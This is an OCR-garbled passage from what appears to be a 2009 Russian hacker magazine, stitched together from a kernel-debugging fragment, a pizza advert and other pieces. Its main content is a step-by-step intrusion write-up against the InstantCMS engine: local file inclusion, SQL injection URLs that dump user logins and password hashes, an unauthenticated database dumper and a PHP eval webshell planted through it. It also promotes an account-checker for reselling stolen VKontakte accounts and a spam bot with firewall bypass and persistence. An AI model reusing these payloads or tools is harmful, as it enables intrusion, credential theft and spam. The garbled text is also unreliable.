своего \Ооситеп1;5 апб 5еШпдз\гоо1:\І\ІТІІ5ЕВ.ВАТ. Далее: 

кс!> Ьк _кі1е_оЬз еск 0х8169ЪЗс0 ЗесСіопОЬН ескРоіпкег 

пкЫІ !_ЕІЕЕ_ОВЙЕСТ 

+0x014 ЗескіопОЬз ескРоіпкег : 0x8182 бЬбс _ЗЕСТІ(Ж_ 



ОВЙЕСТ_РОШТЕКЗ 

кЬ> Ьк _ЗЕСТКЖ_ОВЬЕСТ_РОШТЕКЗ 0x8182 бЬбс ЗЬагеЬСасЬеМар 
пкЫІ !_ЗЕСТ10Ы_0ВЗЕСТ_Р0ШТЕКЗ 

+ 0x004 ЗЬагеЬСасЬеМар : 0х816екс118 -> открытая карта 
уникальна для дискового файла 

кЬ> Ьк _ЗНАВЕБ_САСНЕ_МАР 0х816екЫ8 ѴасЬз 
пк ! _3 Н АКЕ Б_С АС Н Е_МА Р 

+0x040 ѴасЬз : 0х81868е78 -> 0х819Ьаа88 _ѴАСВ -> мас- 
сив ѴАСВ 

Кроме ТОГО: 

кЬ> Ьк _ЗНАКЕЕ_САСНЕ_МАР 816еіЫ8 ЕіІеЗіге 
пЬ ! _ЗНАКЕО_САСНЕ_МАР 

+ 0x008 ЕіІеЗіге : _ЬАВСЕ_ШТЕСЕК 0x140000 

0x140000 / 0x40000 = 5 элементов в массиве указателей 
ѴАСВ. 

Теперь смело дампим его: 

кЬ> ЬЬ 0х81868е7 8 18 

81868е7 8 819Ьаа88 819ЬаЬа8 819ЬаЬ60 819ЬаЬЬ8 
81868е88 819Ьаа70 00000000 00000000 00000000 

Видим, что в кэше присутствуют все части файла 5 * 256 * 1024 = 
0x140000 байт. 

Если нам нужны данные со смещения ноль, то выполняем команду: 

ксІ> сік _ѴАСВ 819Ьаа88 ВазеАсісІгезз 
пЬ ! _ѴАСВ 

0x000 ВазеАсісІгезз : ОхсТМОООО 

Это, собственно, и есть данные с начала файла піизег.сіаі. 

ТЕПЕРЬ ВСЕ! Для модифицирования нужных данных необходимо 
иметь парсер реестра и знать, с какого смещения в кусте начинают- 
ся данные. А дальше — по вышеприведенной схеме. Аналогичным 
образом модифицируются и данные в МЕТ, но об этом я расскажу в 
другой раз, после того, как скушаешь и переваришь информацию :]. 
На этой ноте кланяюсь и еще раз желаю удачи в отладке! ц-ц 
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5іпсе 1956 



Зрігііо сІеІГ ІТаІіа! 



сВярро 




СО ВКУСОМ 

художник должен быть голодным! ^ 

Если вкуснейшая ароматная пицца способна не только принести тебе огромное удовольствие, 
но и вдохновить ~ этот конкурс для тебя. 

Приходи в любой ресторан "Сбарро", возьми у официанта коробку из-под пиццы (твой мольберт), 
маркеры (твои кисти) - и начинай творить! 

Если именно твоя работа будет признана лучшей - Пикассо не знал такой популярности - она 
появится на сотнях коробок с пиццей! 



Хороший 




ТВОЙ ПРИЗ - 10 регулярных (на тонком тесте) пицц* 




Наслаждайся вкусом, 
черпай вдохновение, 
дари красоту! 









"Победитель может заказать 
себе 10 любых регулярных 
пицц до 31.12,09. 
Ассортимент уточняйте 
у оператора. 
Заказать можно как одну, 
так и более пицц 
за одну доставку. 



Служба доставки: (495) 741 -77-55 Условия конкурса на Іі1ір://\*ѵѵѵѵ.5Ьагго.ги/ргото_асТіопз/ 





СОЦИАЛЬНЫЙ 

взлом РЕМ-ТЕ5ТІМ6 

ПОПУЛЯРНОГО ДВИЖКА СОЦСЕТИ 

СОЦИАЛЬНЫЕ СЕТИ ВНЕЗАПНО СТАЛИ ОЧЕНЬ ПОПУЛЯРНЫ. 
СЕЙЧАС СОЦИАЛЬНАЯ СЕТЬ - ЭТО И СПОСОБ ПООБЩАТЬСЯ. 

И НАЙТИ ДРУЗЕЙ. А ДЛЯ КОГО-ТО - ЗАРАБОТАТЬ ДЕНЬГИ. 

И НЕТ НИЧЕГО УДИВИТЕЛЬНОГО. ЧТО КАЖДЫЙ ЗАХОТЕЛ СОЗДАТЬ 
СВОЮ СОЦСЕТЬ. КАК РАЗ ДЛЯ ЭТОГО БЫЛ НАПИСАН ПРОСТОЙ. 
УДОБНЫЙ (И, КАК ПОЗЖЕ ВЫЯСНИЛОСЬ. ИЗОБИЛУЮЩИЙ 
УЯЗВИМОСТЯМИ) ДВИЖОК. ИМЯ ЕМУШЗТАИТСМЗ. 





ш 



г, 

в 



В ПРЕДДВЕРИИ АТАКИ Бродя по просторам рунета, я наткнулся 
на один сайт. Его контент очень напоминал СМ5, и я решил узнать, 
что же он из себя представляет. Недолго думая, я попытался найти 
админку, вбив в адресную строку: 



тш. зіСе . ги/асітіп/ 

После этого мне оставалось только лицезреть поле ввода логина и 
пароля, а также надпись «ІпзІапіСМЗ — Авторизация». Навестив гугл 
с запросом ІпзІапЮМЗ, первым результатом я получил ссылку на 
официальный сайт двига — ѵѵѵѵѵѵ.іпзТапТстз.ги . Последней версией 
на данный момент оказалась 1.5.2. Через минуту исходники лежали 
на моем жестком диске. 

вкаѵ-вох 

Подняв на своем компьютере арасбе и тузці, я установил цмс 
и принялся за анализ исходного кода. Первое, что бросилось в 
глаза — это папка ѵѵузіѵѵуд, в которой находился до боли знакомый 
РСКесПіог На мой взгляд, РСКесІіІюг — лучший помощник при нали- 
чии локального инклуда. По адресу 

ЪЦЦр : //ІосаІЬозС/ѵѵузіѵѵуд/есііЦог/ЕіІетападег/ 
соппесСогз/ЦезЦ . ЬСтІ 



находится аплодер файлов. К сожалению, файлы с расширением 
.рГір, . р Ы:т I, .сді и т.п. залить не получится, однако при наличии І_РІ 
это уже неважно, ведь файл с любым расширением выполнится как 
рбр-код. БРІ+РСКебБог — и шелл у нас в кармане. Но все же это 
трудно назвать уязвимостью ІпзІапЮМЗ, потому что разработкой 
фцкэдитора занимаются совсем другие люди. Поэтому, так как все 
работает через тосІ_геѵѵгМ:е, я решил заглянуть в .Ыассезз и нашел 
там вот что: 

#СОМР(ЖЕЫТ "КЗЗ ЕЕЕБЗ " 

КешгіЬеКиІе л гзз/ ([а-г]*)/(.*) /ІеесН гзз$ 

/сотропепСз/гззІеесІ/ ІгопЕепсІ . рЬр?&ЦагдеЦ=$1&іЦет_і<і=$2 

В надежде найти 50І_-Іщес1:іоп я направился к файлу ГгопІепсІ.рЬр и 
увидел там интересный код: 

ІИ ( іззеС ( $_ЕЕ01ІЕЗТ [ ' с3.о ' ] ) ) { 

$йо = $_ЕЕ01ІЕЗТ [ ' с3.о ' ] ; 

} еізе { $сіо = ' гзз'; } 

И ( іззеС ( $_ЕЕ01ІЕЗТ [ ' СагдеС '*]))! 

$СагдеС = $_ЕЕ0иЕЗТ [ 1 СагдеС 1 ] ; 

} еізе { сііе ( ) ; } 

ІИ ( іззеС ( $_ЕЕ01ІЕЗТ [ 1 іСет_іс1 1 ] ) ) { 
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А Файл прдад журнал ^кладки Инструменты Олдаед 





РСКЕйІТОР НАСАИТЕ 
Ш5ТАЫТСМ5.РУ 



- С X А 

Согшесіог СштеіЛ Ро1<Іег 

р нр N Р 






Кезоигее Туре 



^ (лс^вМега Ш: Рокінз аг>а Г0е& СгеаЬе РоМег РіІеЩоа4 



| Обзор. 1 1 Цріоасі I 

ЕГКЬ: р^ош&с^г рЬр^Сошпші^Ю^іРЫаег&АйаТУе?^Т^е=РіІе&Сцгге[гіРоІ^р=%2Р 

С этим ХМЬ- файлом не связана ни одна таблица стилей. Ниже показано дерево элементов. 



- <СаппегГог соішііап(1=' І ’ІіеСІ : 'о]<1ет5АпііІ 7 і1е5‘ г е 5 ошх вТурв- Г ііе > 
<СштепіРоЫег ра*1і= 1 игі^ТпрЬаіГ/> 

- <ГоІсІег$:> 

<1? оІЛет паліе= ЫОЯ*/^ 




3 





В АДМИНКЕ 



Попав в админку, шелл можно залить несколькими способами, но самый эффективный 
— через баннеры. Переходим в Главная -> Компоненты -> Баннеры , жмем «Новый 
баннер» и загружаем рбр-шелл, проверки на расширение нет. Шелл будет распола- 
гаться по адресу ехатрІе.сот/ітадез/Ьаппегз/зЬеи.рЬр . 

I 




$іЕет_іс1 = $_КЕ0иЕ8Т [ ' іЕет_ісГ ] ; 

} еізе { <ііе ( ) ; } 

іі ( $с1о== ' гзз ' ) { 

$Г55 = ' ' ; 

іі (іі1е_ехізЕз ($_8ЕЕѴЕЕ[ ' ВОСШЕОТ_КООТ ' ] . 

’ /сотропепЕз/ ’ . $ЕагдеЕ . ’ /ргзз . рЪр 1 ) ) { 
$іпСоге->іпс1и<іеЕі1е ( 1 сотропепЕз/ 1 . 

$ЕагдеЕ . ’ /ргзз . рЪр 1 ) ; 

Да это же чистой воды І_осаІ Рііе Іпсіизіоп в переменной $іагде1:! Если в 
конфигурации РНР директива тадіс_дио1:е5_дрс = оіі , мы можем про- 
инклудить любой файл, указав нул-байтом конец строки таким образом: 

ЬЕЕр : //ІосаІЬозЕ /сотропепЕз /г ззЕеей/ЕгопЕеп<і.р1ір?іЕет_іі= 
1&ЕагдеЕ= /еЕс/ЕюзЕз%00 

Следует заметить, что способ обхода тадіс_дио1;е_дрс подстановкой 
>4000 слешей в данном случае работать не будет, так как путь до 
файла объявлен с помощью переменной $_5ЕНѴЕН['00СІЛѴІЕІ\ІТ_ 
РООТ'], а, следовательно, вызов функции деШѵѵбО не выполняется. 

У нас есть БЕІ, а залить файл с рбр-кодом внутри уже не проблема, 
— вспомни про ЕСКебіог. В случае если администратор отключил 



загрузку файлов в едиторе, ты можешь зарегистрировать нового 
пользователя в системе и залить аватар со злым содержимым :]. 

УКОЛ ВСЛЕПУЮ И НЕ ТОЛЬКО 

Инклуд это хорошо, но и на этом я не остановился, и присмотрелся 
внимательнее к коду файла ІтопТепсІ.рЬр: 

ІЕ (Еі1е_ехізЕз ($_ЗЕКѴЕК[ ' БОСШЕЫТ_КООТ 1 ] . 

1 /сотропепЕз/ ' . $ЕагдеЕ . ' /ргзз . рЬр 1 ) ) 

{ 

$іпСоге->іпс1иіеРі1е ( ' сотропепЕз/ 1 . $ЕагдеЕ . 1 /ргзз . рВр 1 ) ; 
еѵаі ( ' гзз_ ' . $ЕагдеЕ . ' ( $іЕет_ісЦ $сід, $гззйаЕа) ; ' ) ; 

В папке сотропепТз находились различные компоненты системы, но 
я искал такие, где находился бы файл ргзз.рбр, и нашел такой 

ЕипсЕіоп гзз_Ыод ( $іЕет_ісІ / 

$сід, &$гзз<іаЕа) { 

$саЕ = сІЪСеЕЕіеІсІз ( ' стз_Ыодз 1 , 

' іс!= ' . $іЕет_іс1, 'ІЙ, ЕіЕІе'); 

Поиск функции іЬОеТЕіеІсІз привел меня к файлу /соге/стз.рбр: 



© ФИШКИ ѴѴШ00ѴѴ5 7: НОВЫЙ ТАСКБАР И .ШМР-ЛИСТЫ 



Одна из самых заметных 
новинок с позиции пользо- 
вателя (даже самого уша- 
стого] — это, конечно же, 
обновленный таскбар. Это не 
просто симпатичная панель- 
ка с большими кнопками, а 
удобный инструмент, объеди- 
няющий в себе механизм для 
быстрого запуска программ, 
управления окнами и доступа 



к последним документам. 
Это стало возможным за 
счет так называемых іиітір- 
листов. По своей сути 
такой выпадающий список 
аналогичен меню «Пуск», 
но только для конкретного 
приложения — в нем ото- 
бражается список послед- 
них документов, ключевые 
опции приложения. За при- 



мером далеко ходить не 
нужно — кликни в таскбаре 
правой кнопкой мыши по 
иконке Іпіегпе* Ехріогег 8.0. 
С помощью іитр-листов ты 
сможешь быстро перейти 
по линку из истории брау- 
зера. Удобно, правда? К 
сожалению, полноценная 
поддержка нового таскбара 
пока не реализована во всех 



приложениях (кстати, статья 
по этому поводу уже была 
у нас в Кодинге). Но недо- 
статок исправляется энту- 
зиастами: для популярных 
программ выходят специ- 
альные хаки. Например, для 
плеера ѴѴіпатр давно раз- 
работан специальный плагин 
ѵѵіп7зЬеи ( сосіе.доодіе.сот/р/ 
уѵіп7зІіе ). 







Экспорт базы данных завершен. Скачать файл | Удалить файл 

Чтобы скачать файл, щелкните правой кнопкой мыши по ссылке и выберите "Сохранить 
объект как..." 



ч 



УСПЕШНО ВЫПОЛНЕННЫЙ ДАМП БАЗЫ 
ЯШ 



ИМ 



«4-1^ ют 




ПАНЕЛЬ УПРАВЛЕНИЯ САЙТОМ 



іипсЬіоп сІЪСеЬЕіеІсІз ( $ЬаЫе , $ѵтЪеге, 
$ііе1с1з, $огс1ег= ' ісЗ. АЗС') 

{ 

$іпЬВ = стзЬаЬаЪазе : : деЫпзЬапсе ( ) ; 
геЬигп $іпЬВ->деЬ_:Еіе1с1з ( $ЬаЫе , 
$Шеге, $1іе1сІз # $огс1ег) ; 

} 



Как быстро раскрутить слепую инъекцию — читай в статье Оѵѵагаг’а 
в предыдущем номере ц-с Инъекция это хорошо, а еще лучше — 
когда видишь результат запроса; через 10 минут анализа кода был 
найден файл соге/аіахАадзеагсЬ.рЬр, а в нем — следующее содер- 
жимое: 

$4 = ісопѵ( 'ІІТР-8//ІСЖЖЕ ' , 'ШШОШ-12 51//ІСЖЖЕ ' , 
$_СЕТ [ ' д ' ] ) ? 

$4 = зЬЫоІомег ( $д) ; 

( ! $< 3 ) 
геЫгп; 

сіеііпе ( " ѴАЬІБ_СМ5 " , 1) ; 

іпсіисіе ( $_ЗЕКѴЕК [ ' БОСШЕШЩКООТ ' ] . 

' /іпсіисіез/сопіід . іпс . рЪр ' ) ; 
іпсіисіе ( $_8ЕКѴЕК [ ' БОСШЕШЩДООТ ' ] . 

' /іпсІисІез/сІаЬаЪазе . іпс . рЪр ' ) $ 

$зд1 = "ЗЕЬЕСТ Сад ЕКОМ сшз_Садз ШЕКЕ ЬОШК(Ьад) 
ЫКЕ ' { $сд} % ' СКОЬР ВУ Сад"; 

$гз = тузд1_диегу ( $зд1 ) ; 



По правде говоря, все эти скачки по файлам мне изрядно поднадо- 
ели, но финиш был близок. Файл /соге/сІаззез/сІЬ.сІазз.рЬр показал 
мне содержимое функции деМіеШз: 



И к моему удивлению — также никакой проверки переменной 
$_СЕТ[‘д’], плюс ко всему результат запроса выводился на страницу. 
Запрос 




риЫіс іипсЬіоп деЬ_ііе1с1з ( $ЬаЫе , 

$Шеге , 

$ 1101 ( 13 , 

$огс1ег= ' ісЗ. А8С ' ) 

{ 

$зд1 = "ЗЕЬЕСТ $1іе1сіз ЕКОМ $ЬаЫе ШЕКЕ $Шеге 
ОКБЕК ВУ $0Г(1ег ЫМІТ 1 " ; 

$гезиІЬ = $ЬЪіз->диегу ( $зд1 ) ; 



ЪЫр : //ІосаІЬозЬ/соге/аз ах/ЬадзеагсЪ . рЪр?д=поЬехізЬ 
Сад) ' +ипіоп+зе1есЬ + сопсаЬ ( Іодіп , ' : 1 , раззчлгогсі) +ігош+с 
шз_изегз+1ішіЬ+1 , 1--+ 

показал мне логин и тб5(пароль] первого пользователя в базе, а 
убрав Іітіі, я получил всех пользователей. Данная ЗСН-ІщесЪоп 
будет работать только при отключенной директиве тадіс_циоІез_ 
дрс. 



І:І ( $Ыіз->пит_гсжз ( $гези1Ь) ) 

{ 

$с1аЬа = $ЬЪіз->іеЬсЪ_аззос ( $гезиІЬ ) ; 
геЫгп $с1аЬа; 

} еізе { 

геЬигп іаізе; 

} 

} 



БОЛЬШЕ НЕМ ДАМПЕР 

Не рассчитывая на что-то большее, я залогинился в админке с 
целью найти способ заливки веб-шелла, и первое, на что обратил 
внимание, был дампер базы данных. Я решил найти его исходник в 
папке абтіп. Но он оказался совсем в другом месте, а именно — в 
соге/аіах/сІитрег.рЬр. Самое интересное, что при прямом обраще- 
нии к нему не было никакой авторизации! А это значит, любой поль- 
зователь без админских привилегий может сделать дамп базы. 



На всем пути моего путешествия я не встретил ни одной проверки 
значения переменной ііет і сі , за исключением файла .Ыассезз. 
Следовательно, у нас в кармане здМщесЪоп, но, к сожалению сле- 
пая. Пример использования: 

ЪЫр : //ІосаІЪозЬ/сотропепЬз/гззіеесІ/ігопЬепсІ. рЪр? 
іЬет_іс1=1 + ап(1+1=іі ( зиЪзЬгіпд (ѵегзіоп ( ) , 1 , 1) =5 ) Ыагде 
ЫЫод 



іі ( $іпСоге->гедиезЬ ( ' іііе ' , 'зЬг')) 

{ 

$зЪогЫі1е = $іпСоге->гедиезЬ ( ' іііе ' , ' зЫ'); 

} еізе { 

$зЪогЫі1е = сІаЬе ( ' сІ-т-У ' ) . ' . зді ' ; 

} 

$орЬ = $іпСоге->гедиезЬ ( ' орЬ ' , ' зЫ', ' ехрогЬ ' ) ; 
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ВСЕ ПОЛЬЗОВАТЕЛИ 



с~иі 




ВЕБ-ШЕЛЛ:) 



С0ДЕРЖИМ0Е/ЕТС/РА55ѴѴ0, ПО- 
ЛУЧЕННОЕЧЕРЕЗ І.РІ 



$біг = РАТН. ' /Ьаскирз ' ; 

$€і1е = $біг . ' / ' . $зЬогк^і1е ; 



Польза от этой уязвимости незначительная, но все же есть. Пример 
использования: 



іі ( $орб== ' ехрогб ' ) 

{ 

іпсіибе ( $_ЗЕКѴЕК [ ' ВОСШЕШ1ДООТ ' ] . 

' /іпсІибез/бЬехрогб . іпс . рЬр ' ) ; 
іі ( |з_Ѵ7ГІбаЫе ( $біг ) ) 

{ 

$с1шпрег = пехѵ МуЗОЬБишр ( $іпСоп1->бЬ_Ьазе , 
$1і1е, Іаізе, Іаізе) ; 

$битрег->боВитр ( ) ; 
іі ( ! $іпВВ->еггпо ( ) ) 

{ 

$1і1еиг1 = ' /Ьаскирз/ $зЬогб:Еі1е; 
есЬо '<зрап зку1е= " соіог : дгееп" >Экспорт 
базы данных завершен . </зрап> <а Ьгеб=" / 

Ьаскирз/' . $зЬюгб1і1е . ' " кагдек= "_Ыапк" >Скачать 
файл</а> I <а Ьгеб=" #" опс1іск= " беІеЬеВитр 
( \ . $зЬогкбі1е. ' \ ' ) ">Удалить файл</а><(3іѵ 

с1азз= "ЫпббехЦ " >Чтобы скачать файл, щелкните правой 
кнопкой мыши по ссылке и выберите "Сохранить объект 
как . . . " </біѵ> ' ; 

} еізе { 

есЬо '<зрап збу1е= " соіог : геб" >Ошибка экс- 
порта базы</зрап> ' ; 

} 

} еізе { 

есЬо ’<зрап збу1е= " соіог : геб" >Папка "/Ьаскирз" 
не доступна для записи !</ зрап> ' ; 

} 

} 

При обращении к файлу с параметром орі, равным ехрогі, и 1і Іе, 
равным битр.зці, в папке /баски р/ создастся файл битр.зці. 
Пример: 



Ьббр : //ІосаІЬозб/соге/аз ах/битрег . рЬр? 
орб=бе1ебе&1і1е= . ./іпбех.рЬр 

Ну и, наконец, самое интересное, — мы можем делать бэкап, причем 
можем задать любое имя файла. Что же нам мешает создать файл с рас- 
ширением .рбр, а перед этим записать в базу рбр-код? А мешают филь- 
тры. Х55-фильтров разработчики поставили очень много, но я нашел 
место, где символы «<>» не обрезаются. Для этого регистрируемся на 
сайте и идем в свой профиль, а именно — в раздел «Мой Блог», созда- 
ем там персональный блог, переходим в него и постим новую запись: 

<?рЬр 

еѵаі ( $_СЕТ [еѵ] ) ; 
біе; 

?> 

В итоге, в БД запишется наш рбр-код и останется только создать 
дамп с расширеним .рбр : 

Ьббр : / /ѵ\7Ѵ\7Ѵ\7'. ехашріе . сош/со^е/а^ ах/бишрег . рЬр? 
орб=ехрогб&1і1е=зЬе11 .рЬр 

Теперь наш шелл создан и находится по адресу: 

Ьббр : / /ъгѵт. ехашріе . сош/Ьаскир/зЬеІІ . рЬр?еѵ=рЬріп!о ( ) ; 

□ УТРО 

Написать свою СМ5 довольно сложно, но еще сложнее уследить за 
безопасностью. Атак как личные блоги и соцсети плодятся, как грибы 
после дождя, найти потенциально уязвимый сайт становится проще. 
Учись на чужих ошибках, и помни, что все, что ты только что прочитал, 
написано исключительно с целью ознакомления, и ни автор, ни редак- 
ция не несут ответственности за твои действ и я . пт 



ИШбр : //ІосаІЬозб/соге/аз ах/бишрег . 
рЬр?орб=ехрогб&1і1е=битр . зді 

Пробежав глазами по коду, я нашел удаление произвольных фай- 
лов: 

іі ( $орб== 1 беіебе 1 ) { 
іі ( ©ипііпк ( $1і1е) ) { 

есЬо '<зрап збу1е= " соіог : дгееп" >Файл удален. </ 

зрап> ' ; 

} еізе { 

есЬо '<зрап збу1е= " соіог : геб" >Ошибка удаления 
файла . < / зрап> ' ; 

} 

} 



Файл Правка Вид Журнал Закладки Инструменты Справка 




Э Новости Сочи 
[І1 Статьи о Сочи 
® Фотогалерея 
Ш Блоги 
^ Клѵбы 
^ Фо румы Сочи 
СВ Яппппгиі и птв 



ВНИМАНИЕ! КОНКУРС. 



Объявляется конкурс на лучший ра 
Подробности »> 



ДОБРО ПОЖАЛОВАТЬ! 



ПРИМЕРСОЦСЕТИ НАОСНОВЕ ІЫ5ТАІЧТСМ5 
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ПРОГРАММЫ ДЛЯ ХАКЕРОВ 



ПРОГРАММА: МІІІ.ТІ РНР 
ОЕСВѴРТОВ 
ОС: *ЫІХ/ѴѴІЫ 
АВТОР: ЕІІ6ЕЫ 

Оченьчасто мы сталкиваемся сзашифрованным 
сорцами какого-либо рбр-скрипта. Причем 
исходники нам просто жизненно необходимо 
увидеть в первозданном виде (например, узнать 
доступы к базе данных]. Как тут поступить? 

Если шифрование выполнялосьс помощью 
Еепб.тотутвсе понятно: идем в гугл, набираем 
что-то вроде «бегепбегбоѵѵпіоаб» и наслаж- 
даемся расшифрованным кодом. А если крипт 
выполнялся при помощи обфускации и запуты- 
вания кода? Можно, конечно, вручную, строка за 
строкой сидеть и приводить сие непотребство 
вудобоваримый вид, потеряв при этом целый 
рабочий день, но мы поступим иначе. 
Специально для тебя мы выкладываем «Мульти 
рбр дешифровщик»отЕидеп. 

Итак, скриптумеет расшифровывать следующие 
алгоритмы: 

• С2ІР+ВАЗЕ64 

• БЕРЬАТЕ+ВАЗЕ64 — Епсосіегоѵ . пек 
(г57 , с99 и т.п. ) 

• ВАЗЕ 6 4 

• Еидеп — «10 ключей» + поддержка ста- 
рого алгоритма с 1-м ключом 

• КАЬЫЗТО (без расшифровки обфуска- 
ции в последних версиях) 

• СЕЗ - СЫСгурбо (спзбабз и т.п. ) 

• Рйр ЬоскІТ (с обходом лицензии и 
срока действия скрипта) 

• ЗоигсеСор 

Болеетого, успешно расшифровываются даже 
вложенные криптовки. Если закриптована 
часть скрипта, будет расшифрована только она. 
Для примера рассмотрим способ дешифровки 
алгоритма СІМСгурІю. 

1. Особенности самого алгоритма: 

• Обфускация; 

• Криптование кода дешифровки; 

• Хранение кода в комментарии в этом же файле; 

• При раскриптовке скрипт читает сам себя. 

2 . Закриптованный код выглядит так: 

/*СЫЗ<какие-то б цифржод*/ 

В этом коде/*СЫ5, 6 цифр и */ следует отбросить; 
нам нужен только Ьазе64 код между ними. Даль- 
ше следует строка — ключ для расшифровки. 
Генерируется он так: 

$Тиск = аггау ( ) ; 

Іог ( $ і = 97; $і < 123; $і++) $Тиск[] = 



скг ( $і ) ; 

Тог($і = 65; $і < 91; $і++) $Тиск[] = 
скг ( $ і ) ; 

$кеу = ітріобе ( " " , $Тиск) ; 

Читаем второй ключ иззакриптованного кода. 
Это будутпервые 52 символа, остальныеже сим- 
волы после них — и естьзашифрованный код. 
Расшифровать его можно так: 

$бесобеб = Ьазе64_бесобе (зСгСг ($епсо 
беб, $кеу , $ко) ) ; 

Как видно, сначала раскодируется Ьазе64, а 
потом символы 1 -го ключа заменяются симво- 
лами второго. 

Для запуска процесса дешифровки положи 
скрипти, собственно, расшифровываемый 
файл в однудиректорию. Далее в скрипте найди 
строки: 

<? 

// Закриптованный файл 
$Ті1е = "1 .рЬр" ; 

?> 

И измени значение переменной $Ш.е на свое. 
Расшифрованный код запишется прямо втвой 
файл. 

Если утебя есть идеи по расшифровке алгорит- 
мов, смело можешь адресовать их авторутулзы в 
топике Ьгит.еиаеп.5и/5Ьоѵѵ1:ЬгеасІ.рЬр?1=47 . 

П РО ГРАМ МА: ѴКСНЕСКЕР ЫТЕ 0.2 
ОС: ѴѴІ N 0ІѴѴ5 95/98/М Е/2000/2003/ 
ХР/ѴІ5ТА 

АВТОР: йХ 

Сколько уже написано разнообразных чекеров 
«ВКонтакта» — не перечесть! Вот и на этот раз 
представляем тебе очередную программу для 
работы с аккаунта ми общеизвестной социаль- 
ной сети — ѴКСбескег БТеза авторством бх. 
Функционал программы: 

- написана на ассемблере (отсюда размер ехе — 
36.5 кб в незапакованном виде); 

• простой чекаккаунтов на валид-невалид; 

• чекаккаунтов с определением Ю; 

• поддержка сервиса антикапча; 

• поддержка прокси, соксб (опционально и 
можно их не задавать); 

• МНОГОПОТОЧНОСТЬ; 

• задание задержек для потоков; 

• определение баланса антикапчи; 

• отсылка жалобо неправильно распознанныхакках; 

• возможность задать разделители для аккаун- 
тов, прокси, результата; 




Главное окно программы 

•ЛОГ работы; 

• возможность создавать подробный НТМБ- 
отчет, куда записываются логин, пароль, Ю, 
количество друзей и голосов, рейтингаккаунта; 

• возможность за писывать туда же список групп, 
в которых пользователь имеет права админист- 
ратора или модератора; 

• сбор Ю-приложений, которыми владеет 
человек; 

• возможность сохранения плохих аккаунтов в 
отдельный файл; 

• возможность сбора аккаунтов по критериям 
рейтинга/количества друзей/числа голосов, 
отбор нужных аккаунтов в отдельный список; 

• чекаккаунтов и разбивка их на группы по 
кол ичествудрузей; 

• подробная статистика для собранных по крите- 
риям аккаунтов; 

• сохранение и загрузка текущих настроек 
программы; 

Возможности столь маленькой утилиты, напи- 
санной на ассемблере, впечатляют :]. 
Пользоваться чекером не просто, а очень 
просто: вбивай в левое окошко списокаккаунтов 
социальной сети (поумолчанию логин и пароль 
разделены двоеточием) и дави на кнопку 
«Старт». В окошке «Оооб» будут появляться 
отчеканные валидныеучетки пользователей. 
Также советую разобраться с настройками и 
фичами проги: окошки «Опции», «Настройки 
критериев» и вкладка «Дополнительно» — здесь 
есть где разгуляться пытливому хакеру :). 

И напоследок— небольшое пособие-пример от 
автора для тех, кто продает аккаунты «ВКонтак- 
та», ориентируясь на число друзей: 

1. Включаем проверку по критериям; 

2 . Ставим критерий «число друзей» больше, 
например, 10; 

3. Ставим опцию установки чекера на паузу 
после сбора, например, 20000 друзей. 

Теперь чекер будет приостановлен, и ты смо- 
жешь забрать начеканные аккаунты с суммой 
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друзей 20000, потом обнуляй статистику, очи- 
щай список собранных аккаунтов и продолжай 
собирать следующую пачку аккаунтов с суммой 
друзей 20000. 



ПРОГРАММА: СПАМ БОТ 
ОС: ѴѴІЫ0ІѴѴ5 95/98/МЕ/2000/2003/ 
ХР/ѴІ5ТА ДЛЯ БОТА И БИЛДЕРА, 
*ЫІХ/ѴѴІЫ ДЛЯ АДМИНКИ 
АВТОР: 5І.Е5Н 

Представляем твоему вниманию очередную 
программу, написанную на ассемблере — Спам 
бототзіезб'а. На дискеты найдешь архив с ад- 
минкой бота, исходники бота ЕА5М и исходники 
билдера на ОеІрЫ. Описывать, как внедрить бота 
в чужую систему — уже не моя задача, поэтому 
представляю тебе описание функционала и 
принципы действия бота. 

Скомпилированный бот действует следующим 
образом: 

1. Бот расшифровывается; 

2 . Бот получает адреса АРІ-функций, которые 
он юзает; 

3. Бот проверяет наличие того, что он уже запу- 
щен, и если так, то самовыключается; 

4 . Устанавливает себя в систему в папку шаб- 
лонов и прописывается в автозагрузке; 

5 . Выделяет память для своих нужд; 

6 . Прописывает себя в реестре для обхода 
встроенного в ХР файрвола; 

7 . Стучится в админку; 

8 . Если получена команда ждать, ждет указан- 
ное время; 

9 . Если получено задание, то парсит его и 
запускает указанное количество потоков 
отправки письма; 

10 . Перед каждой отправкой письма обрабаты- 
вает макросы в нем; 

11 . Отсылает письма, пока они есть в задании; 

12 . Во время выполнения задания периодичес- 
ки стучит в админку с результатами отправки. 
Теперь о возможностях бота: 

• обход встроенного в ХР файрвола; 

• криптовка (если юзать билдер); 

• многопоточная отправка; 

• поддержка макросов на уровне админки и 
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бота; 

• лог ошибок отправки; 

• самоустановка в систему; 

• возможность бана плохих ботов; 

• шифрованиетрафа между ботом и админкой. 
Для установки бота сначала необходимо скон- 
фигурировать админку (файл сопІід.рЬр): 

<?рЬр 

$с!Ъ_ЬозЦ= 1 ІосаІЬозС ' ; // хост с бд 
$бЬ_рогб=33 06 ; // порт бд 
$бЬ_изег= * гооб ' ; // юзер бд 
$бЬ_разз= 'разз 1 ; // пасс от бд 
$бЬ_паше= 1 зЪоб ' ; // имя базы в бд 
(нужно создать самому) 



$абшіп_паше= ' ' ; // имя пользователя 



для доступа к админке 
$абтіп_разз= ' ' ; // пароль для досту- 
па к админке 

$ТІМЕ_ЫМ= ' 00 : 01 : 00 ' ; // 

( часы : минуты : секунды ) если время 
последнего отстука больше данного , 



ХАКЕР 1 1 /131/ 09 




Админка спамбота 



оооооо 



то считается, что бот ушел в офлайн 
$тах_ЬЪ.геас1=5 ; // число потоков для 
спама 

$Ыоск= 1 оп ' ; // блокировка мертвых 
ботов 
?> 

Затем — настроить, собственно, бота и его 
билдер: 

файл: Ьоб.азш: 

МАІТ_ТІМЕ еди 40 — время в секундах 
между отстуками 

зегѵег_рогб ери 5000Ь — порт админки 
файл: сопзб.іпс: 
зегѵег_зсгірб 6Ъ '/шзЬ/базк. 
рЬр? ' ,0,0, 0, 0, 0, 0,0, 0 — путь к ад- 
минке 

зегѵег_Ьозк сПэ ' ІосаІЬозС ' , 0 , 0 , 0 , 0 , 0 
,0,0, 0, 0, 0, 0, 0, 0 — ЬозС админки 
ЩУ_зуз_пате 6Ь 1 Хргода . 
ехе ',0,0, 0, 0, 0, 0, 0, 0, 0, 0 ; ( слеш 
обязателен! ) — имя, с которым прога 
будет сидеть в системе 
МетЕіІеЫате 6Ь ' безб123 ' ,0 — предо- 
твращение повторного запуска 

После этой нехитрой настройки тебе нужно 
будет: 

1. Залить админку на свой сервер и на все 
скрипты и папки поставить права 666; 

